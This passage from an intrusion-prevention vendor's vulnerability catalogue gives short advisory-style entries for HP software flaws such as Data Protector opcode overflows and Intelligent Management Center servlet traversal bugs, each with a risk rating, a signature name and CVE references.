There is a heap memory corruption vulnerability in HP Data Protector Media Operations. The vulnerability is due to insufficient validation of incoming requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted message to port 19813/TCP of the server running the vulnerable product. In the case of successful exploitation execution of arbitrary attacker code may result.

Situation:

Generic_CS-HP-Data-Protector-Media-Operations-Memory-Corruption

References:

OSVDB-76842
http://www.osvdb.org/76842

HP-Data-Protector-Media-Operations-SignInName-Parameter-Overflow

About this vulnerability:

A denial of service vulnerability in HP Data Protector Media Operations

Risk:

High

First detected in:

sgpkg-ips-367-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector Media Operations

Type:

Malfunction

Description:

There is a denial of service vulnerability in HP Data Protector Media Operations. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to cause a denial of service condition.

Situation:

HTTP_CRL-HP-Data-Protector-Media-Operations-SignInName-Parameter-Overflow

References:

BID-44381
http://www.securityfocus.com/bid/44381

OSVDB-68528
http://www.osvdb.org/68528

HP-Data-Protector-Multiple-Products-Finishedcopy-SQL-Injection

About this vulnerability:

A vulnerability in HP Data Protector for Personal Computers

Risk:

Moderate

First detected in:

sgpkg-ips-426-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

SQL Injection

Description:

There is an SQL injection vulnerability in HP Data Protector Notebook Extension and HP Data Protector for Personal Computers. The specific flaw is caused by insufficient validation of the type field in a user supplied SOAP request to the DPNECentral web service. A remote unauthenticated attacker can leverage this vulnerability to execute arbitrary SQL queries on a target system within the security context of the affected service.

Situation:

HTTP_CS-HP-Data-Protector-Multiple-Products-Finishedcopy-SQL-Injection

References:

CVE-2011-3162
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3162

OSVDB-76707
http://www.osvdb.org/76707

HP-Data-Protector-Multiple-Products-Getpolicies-SQL-Injection

About this vulnerability:

A vulnerability in HP Data Protector for Personal Computers

Risk:

Moderate

First detected in:

sgpkg-ips-424-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Input Validation

Description:

There is an SQL injection vulnerability in HP Data Protector Notebook Extension and HP Data Protector for Personal Computers. The specific flaw is caused by insufficient validation of the clientVersion field in a user supplied request to the DPNECentral web service. A remote unauthenticated attacker can leverage this vulnerability to execute arbitrary SQL queries on a target system within the security context of the affected service.

Situation:

HTTP_CS-HP-Data-Protector-Multiple-Products-Getpolicies-SQL-Injection

References:

CVE-2011-3157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3157

OSVDB-76702
http://www.osvdb.org/76702

HP-Data-Protector-Multiple-Products-LogClientInstallation-SQL-Injection

About this vulnerability:

A vulnerability in HP Data Protector for Personal Computers

Risk:

Moderate

First detected in:

sgpkg-ips-438-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

SQL Injection

Description:

There is an SQL injection vulnerability in HP Data Protector Notebook Extension and HP Data Protector for Personal Computers. The specific flaw is caused by insufficient validation of the userid field in a user supplied request to the DPNECentral web service. A remote unauthenticated attacker can leverage this vulnerability to execute arbitrary SQL queries on a target system within the security context of the affected service.

Situation:

HTTP_CS-HP-Data-Protector-Multiple-Products-LogClientInstallation-SQL-Injection

References:

CVE-2011-3156
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3156

OSVDB-76701
http://www.osvdb.org/76701

HP-Data-Protector-Multiple-Products-Requestcopy-SQL-Injection

About this vulnerability:

A vulnerability in HP Data Protector for Personal Computers

Risk:

Moderate

First detected in:

sgpkg-ips-426-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Input Validation

Description:

Situation:

HTTP_CS-HP-Data-Protector-Multiple-Products-Requestcopy-SQL-Injection

References:

CVE-2011-3158
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3158

OSVDB-76703
http://www.osvdb.org/76703

HP-Data-Protector-Omniinet-Service-Null-Dereference-Denial-Of-Service

About this vulnerability:	A vulnerability in HP Data Protector Media Operations
Risk:	Moderate
First detected in:	sgpkg-ips-414-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	HP Data Protector Media Operations
Type:	Malfunction
Description:	A denial of service vulnerability exists in HP Data Protector OmniInet Service. The flaw is due to a NULL pointer dereference error in OmniInet Service when parsing malformed requests. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted request to the target server. Successful exploitation will cause the target service to terminate abnormally resulting in a denial of service condition.
Situation:	Generic_CS-HP-Data-Protector-Omniinet-Service-Null-Dereference-Denial-Of-Service

HP-Data-Protector-Opcode-1091-Directory-Traversal

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-609-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in HP Data Protector. The vulnerability is due to a lack of input sanitization on a file name provided with Opcode 1091. The file name is not sanitized for directory traversal characters, allowing an attacker to create arbitrary files. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation could cause the writing of arbitrary files to the file system which could result in code execution in the context of the the affected service, which is SYSTEM by default.

Situation:

Generic_CS-HP-Data-Protector-Opcode-1091-Directory-Traversal

References:

CVE-2014-5160
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5160

OSVDB-109495
http://www.osvdb.org/109495

HP-Data-Protector-Opcode-27-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in HP Data Protector
Risk:	Moderate
First detected in:	sgpkg-ips-565-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	HP Data Protector
Type:	Buffer Overflow
Description:	A stack buffer overflow vulnerability exists in HP Data Protector. The vulnerability is due to a lack of input sanitization on Strings provided with Opcode 27. The strings are not validated for length before being copied into a fixed-size stack buffer. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation could cause a stack buffer overflow resulting in code execution in the context of the the affected service, which is SYSTEM by default.
Situation:	Generic_CS-HP-Data-Protector-Opcode-27-Stack-Buffer-Overflow

HP-Data-Protector-Opcode-28-And-11-Command-Execution

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

High

First detected in:

sgpkg-ips-598-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Malfunction

Description:

An command execution vulnerability exists in Hewlett-Packard Data Protector. The vulnerability is due to the a design weakness when handling requests to port 5555. A remote attacker can exploit this vulnerability by sending crafted packets to the target service. Successful exploitation could lead to arbitrary command execution with System privileges on the target server.

Situation:

Generic_CS-HP-Data-Protector-Opcode-28-And-11-Command-Execution-2
Generic_CS-HP-Data-Protector-Opcode-28-And-11-Command-Execution

References:

CVE-2014-2623
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2623

BID-68672
http://www.securityfocus.com/bid/68672

OSVDB-109069
http://www.osvdb.org/109069

HP-Data-Protector-Opcode-305-Directory-Traversal

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-610-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in HP Data Protector. The vulnerability is due to a lack of input sanitization of a file name provided with Opcode 305. The file name is not sanitized for directory traversal characters, allowing an attacker to delete or create arbitrary files. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation would result in the of writing arbitrary files to the file system which could result in code execution in the context of the affected service, which is Administrator by default.

Situation:

Generic_CS-HP-Data-Protector-Opcode-305-Directory-Traversal

References:

CVE-2014-5160
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5160

BID-68855
http://www.securityfocus.com/bid/68855

OSVDB-109494
http://www.osvdb.org/109494

HP-Data-Protector-Opcode-42-Directory-Traversal

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-562-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in HP Data Protector. The vulnerability is due to a lack of input sanitization on a file name provided with Opcode 42. The file name is not sanitized for directory traversal characters, allowing an attacker to write arbitrary content to the file system. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation could cause writing arbitrary files to the file system which could result in code execution in the context of the the affected service, which is SYSTEM by default.

Situation:

Generic_CS-HP-Data-Protector-Opcode-42-Directory-Traversal

References:

CVE-2013-6194
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6194

OSVDB-101630
http://www.osvdb.org/101630

HP-Data-Protector-Opcode-45-And-46-Code-Execution

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-563-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Buffer Overflow

Description:

Two vulnerabilities exist in HP Data Protector. Both vulnerabilities are due to insufficient input validation on a string supplied with a message containing opcodes 45 or 46. The length of the string is not validated before being copied into a fixed-size stack buffer, possibly resulting in a stack buffer overflow. Also, the supplied string is not sanitized for directory traversal characters before being used to create a file, resulting in a directory traversal and arbitrary file upload. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation could result in code execution in the context of the the affected service, which is SYSTEM by default.

Situation:

Generic_CS-HP-Data-Protector-Opcode-45-And-46-Code-Execution

References:

CVE-2013-2348
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2348

OSVDB-101627
http://www.osvdb.org/101627

HP-Database-Archiving-Software-Giop-Opcode-0x0e-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Database Archiving Software

Risk:

High

First detected in:

sgpkg-ips-463-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Database Archiving Software

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP Database Archiving Software. Specifically, the application uses a user-supplied signed value to control a copy operation when processing GIOP packets with Opcode 0x0E. This can lead to a stack-based buffer overflow condition. By sending a crafted packet to the target server, a remote unauthenticated attacker can exploit this vulnerability to execute arbitrary code under the context of the service.

Situation:

Generic_CS-HP-Database-Archiving-Software-Giop-Opcode-0x0e-Buffer-Overflow

References:

CVE-2011-4163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4163

BID-51205
http://www.securityfocus.com/bid/51205

OSVDB-78044
http://www.osvdb.org/78044

HP-Database-Archiving-Software-Giop-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Database Archiving Software

Risk:

Moderate

First detected in:

sgpkg-ips-1060-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Database Archiving Software

Type:

Buffer Overflow

Description:

An attempt to exploit a vulnerability in HP Database Archiving Software detected

Situation:

Generic_CS-HP-Database-Archiving-Software-Giop-Parsing-Buffer-Overflow

References:

CVE-2011-4164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4164

BID-51205
http://www.securityfocus.com/bid/51205

OSVDB-78045
http://www.osvdb.org/78045

HP-Diagnostics-Server-Buffer-Overflow

About this vulnerability:

An HP Diagnostics Server Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-784-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP LoadRunner

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in HP LoadRunner, versions 11.00 before patch 4, which allows remote attackers to execute arbitrary code via a crafted size value.

Situation:

Generic_CS-HP-Diagnostics-Server-Buffer-Overflow

References:

CVE-2011-4789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4789

OSVDB-72815
http://www.osvdb.org/72815

HP-Easy-Printer-Care-ActiveX-Control-Directory-Traversal

About this vulnerability:

A vulnerability in HP Easy Printer Care

Risk:

Moderate

First detected in:

sgpkg-ips-437-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP Easy Printer Care Software

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been discovered in the XMLCacheMgr class ActiveX control, which is a component of HP Easy Printer Care. The vulnerability can be triggered by passing malicious parameters to the CacheDocumentXMLWithId() method. A remote attacker could exploit this vulnerability by enticing a target user to visit a malicious web page. A successful attack would result in execution of arbitrary attacker code in the security context of the current user running the browser.

Situation:

File-Text_HP-Easy-Printer-Care-ActiveX-Control-Directory-Traversal

References:

CVE-2011-4786
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4786

OSVDB-78306
http://www.osvdb.org/78306

HP-Easy-Printer-Care-Software-ActiveX-Control-Directory-Traversal

About this vulnerability:

A vulnerability in HP Easy Printer Care Software

Risk:

Moderate

First detected in:

sgpkg-ips-408-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Easy Printer Care Software

Type:

Input Validation

Description:

A directory traversal vulnerability has been identified in HP's Easy Printer Care Software. The vulnerability is due to insufficient input validation by an ActiveX control, which is part of the affected product. A remote attacker could exploit this vulnerability by enticing a target user to view a maliciously crafted web page. This would allow the attacker to overwrite arbitrary files on the target computer with arbitrary content, which could lead to code execution.

Situation:

File-Text_HP-Easy-Printer-Care-Software-ActiveX-Control-Directory-Traversal

References:

CVE-2011-2404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2404

BID-49100
http://www.securityfocus.com/bid/49100

OSVDB-74510
http://www.osvdb.org/74510

HP-Info-Center-ActiveX-Control-Absolute-Path-Traversal

About this vulnerability:

A path traversal vulnerability in HP Info Center ActiveX control

Risk:

High

First detected in:

sgpkg-ips-138-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP Info Center

Type:

Directory Traversal

Description:

There is a vulnerability in the Hewlett-Packard HP Info Center ActiveX control. The vulnerability allows modification of the system registry, which may lead to a system compromise.

Situation:

HTTP_SS-HP-Info-Center-ActiveX-Control-Absolute-Path-Traversal
File-Text_HP-Info-Center-ActiveX-Control-Absolute-Path-Traversal

References:

CVE-2007-6331
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6331

BID-26823
http://www.securityfocus.com/bid/26823

HP-Info-Center-ActiveX-Control-Registry-Get

About this vulnerability:

A vulnerability in HP Info Center ActiveX control

Risk:

Low

First detected in:

sgpkg-ips-138-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP Info Center

Type:

Malfunction

Description:

There is a vulnerability in the Hewlett-Packard HP Info Center ActiveX control. The vulnerability allows reading of the system registry, which may reveal critical system configuration information.

Situation:

HTTP_SS-HP-Info-Center-ActiveX-Control-Registry-Access
File-Text_HP-Info-Center-ActiveX-Control-Registry-Access

References:

CVE-2007-6333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6333

BID-26823
http://www.securityfocus.com/bid/26823

HP-Info-Center-ActiveX-Control-Registry-Set

About this vulnerability:

A vulnerability in HP Info Center ActiveX control

Risk:

Low

First detected in:

sgpkg-ips-138-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP Info Center

Type:

Malfunction

Description:

There is a vulnerability in Hewlett-Packard HP Info Center ActiveX control. The vulnerability allows modification of the system registry, which may lead to a system compromise.

Situation:

HTTP_SS-HP-Info-Center-ActiveX-Control-Registry-Access
File-Text_HP-Info-Center-ActiveX-Control-Registry-Access

References:

CVE-2007-6332
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6332

BID-26823
http://www.securityfocus.com/bid/26823

HP-Info-Center-HPInfo-Class-ActiveX-Control-Insecure-Methods

About this vulnerability:	HP Info Center HPInfo Class ActiveX Control Insecure Methods
Risk:	Low
First detected in:	sgpkg-ips-632-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	HP Info Center
Type:	Malfunction
Description:	Vulnerable ActiveX control methods in HP Info Center allow remote attackers to execute arbitrary commands on a vulnerable machine.
Situation:	File-Text_HP-Info-Center-HPInfo-Class-ActiveX-Control-Insecure-Methods

HP-Intelligent-Management-Center-BIMS-Uploadservlet-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in HP IMC Branch Intelligent Management System Software Module (BIMS)

Risk:

Moderate

First detected in:

sgpkg-ips-547-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP IMC Branch Intelligent Management System Software Module

Type:

Malfunction

Description:

There is a code execution vulnerability exists in the Branch Intelligent Management Software (BIMS) module of Intelligent Management Center. The vulnerability is due to lack of authentication and insufficient input validation in the UploadServlet when processing HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.

Situation:

HTTP_CRL-HP-Intelligent-Management-Center-BIMS-Uploadservlet-Arbitrary-File-Upload

References:

CVE-2013-4822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4822

OSVDB-98247
http://www.osvdb.org/98247

HP-Intelligent-Management-Center-BIMS-Uploadservlet-Information-Disclosure

About this vulnerability:

A vulnerability in HP IMC Branch Intelligent Management System Software Module (BIMS)

Risk:

High

First detected in:

sgpkg-ips-598-5211

Last changed:

sgpkg-ips-1640-5242

Platform:

Generic

Software:

HP IMC Branch Intelligent Management System Software Module

Type:

Directory Traversal

Description:

An information disclosure vulnerability exists in the BIMS add-in module of HP Intelligent Management Center. The vulnerability is due to lack of authentication and insufficient input validation in the UploadServlet servlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary files on a target system.

Situation:

HTTP_CSU-HP-Intelligent-Management-Center-Bimsdownload-Information-Disclosure

References:

CVE-2014-2618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2618

BID-68540
http://www.securityfocus.com/bid/68540

OSVDB-109168
http://www.osvdb.org/109168

HP-Intelligent-Management-Center-Bimsdownload-Information-Disclosure

About this vulnerability:

A vulnerability in HP IMC Branch Intelligent Management System Software Module (BIMS)

Risk:

Moderate

First detected in:

sgpkg-ips-546-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Directory Traversal

Description:

There is an information disclosure vulnerability in the BIMS add-in module of HP Intelligent Management Center. The vulnerability is due to lack of authentication and insufficient input validation in the bimsDownload servlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary files on a target system.

Situation:

References:

CVE-2013-4823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4823

OSVDB-98248
http://www.osvdb.org/98248

HP-Intelligent-Management-Center-Buffer-Overflow

About this vulnerability:

HP Intelligent Management Center Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-683-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability exists in HP iNode Management Center, 5.1 SP1 and before, when handling message types 0x0a0af007, which is due to insufficient boundary checking.

Situation:

Generic_CS-HP-Intelligent-Management-Center-Buffer-Overflow

References:

BID-55160
http://www.securityfocus.com/bid/55160

HP-Intelligent-Management-Center-Database-Information-Disclosure

About this vulnerability:

Policy bypass vulnerability in HP Intelligent Management Center

Risk:

High

First detected in:

sgpkg-ips-314-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP Intelligent Management Center

Type:

Malfunction

Description:

There is a policy bypass vulnerability in HP Intelligent Management Center. A remote attacker can send an HTTP GET request to the target server to retrieve login credentials to the database server.

Situation:

HTTP_CSU-HP-Intelligent-Management-Center-Database-Information-Disclosure

References:

BID-40298
http://www.securityfocus.com/bid/40298

HP-Intelligent-Management-Center-Dbman-Buffer-Overflow

About this vulnerability:

An attempt to exploit vulnerability in HP Intelligent Management Center service detected

Risk:

Moderate

First detected in:

sgpkg-ips-394-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP Intelligent Management Center

Type:

Malfunction

Description:

A buffer overflow vulnerability has been identified in the dbman component of the HP Intelligent Management Center. While processing packets sent to port 2810/UDP, user-supplied data is copied to a stack buffer by calling the sprintf function without performing a boundary check.

Situation:

Generic_UDP-HP-Intelligent-Management-Center-Dbman-Buffer-Overflow

References:

CVE-2011-1850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1850

BID-47789
http://www.securityfocus.com/bid/47789

OSVDB-72393
http://www.osvdb.org/72393

HP-Intelligent-Management-Center-Downloadservlet-Information-Disclosure

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-522-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Directory Traversal

Description:

There is an information disclosure vulnerability in HP Intelligent Management Center. The vulnerability is due to lack of authentication and insufficient input validation in the DownloadServlet servlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary files on a target system.

Situation:

HTTP_CSU-HP-Intelligent-Management-Center-Downloadservlet-Information-Disclosure

References:

CVE-2012-5208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5208

BID-58385
http://www.securityfocus.com/bid/58385

OSVDB-91033
http://www.osvdb.org/91033

HP-Intelligent-Management-Center-Faultdownloadservlet-Information-Disclosure

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-520-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Directory Traversal

Description:

There is an information disclosure vulnerability in HP Intelligent Management Center. The vulnerability is due to a lack of authentication and insufficient input validation when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the file contents of arbitrary files on a target system.

Situation:

HTTP_CSU-HP-IMC-Faultdownloadservlet-Information-Disclosure

References:

CVE-2012-5202
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5202

BID-58385
http://www.securityfocus.com/bid/58385

OSVDB-91027
http://www.osvdb.org/91027

HP-Intelligent-Management-Center-Ictdownloadservlet-Information-Disclosure

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-522-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Directory Traversal

Description:

Situation:

HTTP_CSU-HP-IMC-Ictdownloadservlet-Information-Disclosure

References:

CVE-2012-5204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5204

BID-58385
http://www.securityfocus.com/bid/58385

OSVDB-91029
http://www.osvdb.org/91029

HP-Intelligent-Management-Center-Imcsyslogdm-Use-After-Free

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Malfunction

Description:

A vulnerability has been identified in the imcsyslogdm component of the HP Intelligent Management Center. An exception handler could call into free memory address when handling an overly large syslog packet. By sending a crafted syslog packet to UDP port 514, a remote attacker can exploit this vulnerability to execute arbitrary code under the security context of the SYSTEM user.

Situation:

Datalength-UDP_Long-Syslog-Message

References:

CVE-2011-1854
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1854

BID-47789
http://www.securityfocus.com/bid/47789

HP-Intelligent-Management-Center-Img-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

High

First detected in:

sgpkg-ips-426-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Malfunction

Description:

A buffer overflow vulnerability has been identified in the img component of the HP Intelligent Management Center. When processing packets sent to port 8800/TCP, user-supplied data is directly copied to a stack buffer without boundary check. By sending a crafted packet to the target, a remote attacker can exploit this vulnerability to execute arbitrary code under the security context of the SYSTEM user.

Situation:

Generic_CS-HP-Intelligent-Management-Center-Img-Buffer-Overflow
Generic_CS-HP-Intelligent-Management-Center-Img-Buffer-Overflow-2

References:

CVE-2011-1848
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1848

BID-47789
http://www.securityfocus.com/bid/47789

HP-Intelligent-Management-Center-Mibfileupload-Servlet-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

High

First detected in:

sgpkg-ips-518-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Malfunction

Description:

An arbitrary file upload vulnerability exists in HP Intelligent Management Center. The vulnerability is due to the mibFileUpload servlet accepts unauthenticated file uploads and processes zip files in an insecure way. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges.

Situation:

File-Member-Name_HP-Intelligent-Management-Center-Mibfileupload-Servlet-Vulnerability

References:

CVE-2012-5201
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5201

BID-58385
http://www.securityfocus.com/bid/58385

OSVDB-91026
http://www.osvdb.org/91026

HP-Intelligent-Management-Center-Reportimgservlet-Information-Disclosure

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-521-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Directory Traversal

Description:

There is an information disclosure vulnerability in HP Intelligent Management Center. The vulnerability is due to lack of authentication and insufficient input validation in the ReportImgServlet servlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the file contents of arbitrary files on a target system.

Situation:

HTTP_CSU-HP-Intelligent-Management-Center-Reportimgservlet-Disclosure

References:

CVE-2012-5203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5203

BID-58385
http://www.securityfocus.com/bid/58385

OSVDB-91028
http://www.osvdb.org/91028

HP-Intelligent-Management-Center-Reporting-Information-Disclosure

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-318-4219

Last changed:

sgpkg-ips-1638-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

An information disclosure vulnerability exists in HP Intelligent Management Center. The vulnerability is due to insufficient input validation when processing HTTP request parameters. Using directory traversal characters, a remote unauthenticated attacker can leverage this vulnerability to view the file contents of arbitrary files on a target system. The target will not exhibit any unusual behaviour as a result of this attack. A successful attack will allow the a ttacker to gain access to restricted files. This may lead to disclosure of sensitive information.

Situation:

HTTP_CSU-HP-Intelligent-Management-Center-Sdfiledownload-Information-Disclosure

References:

BID-40298
http://www.securityfocus.com/bid/40298

HP-Intelligent-Management-Center-Sdfiledownload-Information-Disclosure

About this vulnerability:

A vulnerability in HP IMC Service Operation Management Software Module

Risk:

Moderate

First detected in:

sgpkg-ips-549-5211

Last changed:

sgpkg-ips-1831-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Directory Traversal

Description:

An information disclosure vulnerability exists in the SOM add-in module of HP Intelligent Management Center. The vulnerability is due to a lack of authentication and insufficient input validation in the sdFileDownload servlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary files on a target system.

Situation:

References:

CVE-2013-4826
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4826

BID-62898
http://www.securityfocus.com/bid/62898

OSVDB-98251
http://www.osvdb.org/98251

HP-Intelligent-Management-Center-Som-Euaccountserivce-Authentication-Bypass

About this vulnerability:

A vulnerability in HP IMC Service Operation Management Software Module

Risk:

Moderate

First detected in:

sgpkg-ips-551-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Malfunction

Description:

There is an authentication bypass vulnerability in the SOM add-in module of HP Intelligent Management Center. The vulnerability is due to a lack of authentication in the euAccountSerivce (sic) servlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to create a web administration account on a target system.

Situation:

HTTP_CSU-HP-Intelligent-Management-Center-Som-Euaccountserivce-Authentication-Bypass

References:

CVE-2013-4824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4824

OSVDB-98249
http://www.osvdb.org/98249

HP-Intelligent-Management-Center-Stack-Based-Buffer-Overflow

About this vulnerability:

A HP Intelligent Management Center Stack Based Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-705-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2003 SP2

Software:

HP Intelligent Management Center UAM

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in HP Intelligent Management Center UAM, versions before 5.1 E0101P01, in uam.exe which allows remote attackers to execute arbitrary code.

Situation:

Generic_UDP-HP-Intelligent-Management-Center-Stack-Based-Buffer-Overflow

References:

CVE-2012-3274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3274

BID-55271
http://www.securityfocus.com/bid/55271

OSVDB-85060
http://www.osvdb.org/85060

HP-Intelligent-Management-Center-Syslogdownloadservlet-Information-Disclosure

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-523-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Directory Traversal

Description:

